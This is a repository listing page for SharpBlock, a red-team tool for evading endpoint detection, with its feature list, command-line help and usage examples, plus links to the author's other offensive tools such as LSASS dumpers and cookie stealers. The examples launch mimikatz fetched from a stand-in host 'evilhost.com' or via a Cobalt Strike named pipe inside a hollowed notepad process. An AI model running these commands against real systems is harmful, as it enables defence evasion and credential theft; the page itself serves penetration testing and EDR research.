CCob/SharpBlock CCob/SharpBlock

  • Stars
    star
    1,057
  • Rank 42,603 (Top 0.9 %)
  • Language
    C#
  • Created about 4 years ago
  • Updated about 3 years ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
CCob/SharpBlock
github

CCob

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

A method of bypassing EDR's active projection DLL's by preventing entry point exection

SharpBlock

A method of bypassing EDR's active projection DLL's by preventing entry point execution.

Features

  • Blocks EDR DLL entry point execution, which prevents EDR hooks from being placed.
  • Patchless AMSI bypass that is undetectable from scanners looking for Amsi.dll code patches at runtime.
  • Host process that is replaced with an implant PE that can be loaded from disk, HTTP or named pipe (Cobalt Strike)
  • Implanted process is hidden to help evade scanners looking for hollowed processes.
  • Command line args are spoofed and implanted after process creation using stealthy EDR detection method.
  • Patchless ETW bypass.
  • Blocks NtProtectVirtualMemory invocation when callee is within the range of a blocked DLL's address space
SharpBlock by @_EthicalChaos_
  DLL Blocking app for child processes x64

  -e, --exe=VALUE            Program to execute (default cmd.exe)
  -a, --args=VALUE           Arguments for program (default null)
  -n, --name=VALUE           Name of DLL to block
  -c, --copyright=VALUE      Copyright string to block
  -p, --product=VALUE        Product string to block
  -d, --description=VALUE    Description string to block
  -s, --spawn=VALUE          Host process to spawn for swapping with the target exe
  -ppid=VALUE                Parent process ID for spawned child (PPID Spoofing)
  -w, --show                 Show the lauched process window instead of the
                               default hide
      --disable-bypass-amsi  Disable AMSI bypassAmsi
      --disable-bypass-cmdline
                             Disable command line bypass
      --disable-bypass-etw   Disable ETW bypass
      --disable-header-patch Disable process hollow detection bypass
  -h, --help                 Display this help

Examples

Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL

SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee

Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL

execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi

Note, for the upload_file beacon command, load upload.cna into Cobalt Strike's Script Manager

Accompanying Blog Posts:

More Repositories

1

SweetPotato

Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019
C#
1,463
star
2

BeaconEye

Hunts out CobaltStrike beacons and logs operator command output
C#
828
star
3

ThreadlessInject

Threadless Process Injection using remote function hooking.
C#
663
star
4

BOF.NET

A .NET Runtime for Cobalt Strike's Beacon Object Files
C
608
star
5

lsarelayx

NTLM relaying for Windows made easy
C++
513
star
6

Volumiser

C#
318
star
7

MirrorDump

Another LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory
C#
258
star
8

MinHook.NET

A C# port of the MinHook API hooking library
C#
194
star
9

goreflect

Reflective DLL loading of your favorite Golang program
C
163
star
10

SylantStrike

Simple EDR implementation to demonstrate bypass
C
147
star
11

gssapi-abuse

A tool for enumerating potential hosts that are open to GSSAPI abuse within Active Directory networks
Python
127
star
12

PIVert

C#
96
star
13

dnMerge

A lightweight .NET assembly dependency merger that uses dnLib and 7zip's LZMA SDK for compressing dependant assemblies.
C#
93
star
14

PinSwipe

Smart Card PIN swiping DLL
C
71
star
15

gookies

A Chrome cookie dumping utility
Go
48
star
16

PwnyForm

C#
41
star
17

ProvisionAppx

C#
34
star
18

bittrex4j

Java library for accessing the Bittrex Web API's and Web Sockets
Java
31
star
19

PoC

Exploit PoC for CVE's and non CVE's alike
Python
23
star
20

Jboss-Wilfly-Hashes-to-Hashcat

Converts JBoss/Wildfly management users properties file to hashcat format compatible with mode 20
Python
12
star
21

VulnHub

VulnHub Walkthroughs
Python
4
star
22

MediaPortal-AsteriskCid

C#
1
star